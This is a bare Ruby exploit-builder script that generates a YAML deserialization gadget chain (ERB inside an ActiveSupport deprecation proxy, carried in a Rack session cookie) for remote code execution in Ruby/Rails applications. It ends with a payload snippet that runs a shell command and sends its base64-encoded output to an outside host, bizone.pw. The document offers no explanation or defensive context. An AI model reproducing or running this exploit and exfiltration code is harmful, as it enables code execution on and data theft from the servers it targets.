require "erb"
require "base64"
require "active_support"
if ARGV.empty?
puts "Usage: exploit_builder.rb <source_file>"
exit!
end
erb = ERB.allocate
erb.instance_variable_set :@src, File.read(ARGV.first)
erb.instance_variable_set :@lineno, 1
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr))
puts <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
- !ruby/object:Rack::Session::Abstract::SessionHash
req: !ruby/object:Rack::Request
env:
rack.session: !ruby/object:Rack::Session::Abstract::SessionHash
loaded: true
HTTP_COOKIE: "a=#{payload}"
store: !ruby/object:Rack::Session::Cookie
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
key: a
secrets: []
exists: true
PAYLOAD
require "base64"
out = `pwd`
url = URI.parse('http://bizone.pw')
req = Net::HTTP::Get.new(url.to_s + '/?q=' + Base64.strict_encode64(out))
res = Net::HTTP.start(url.host, url.port) {|http|
http.request(req)
}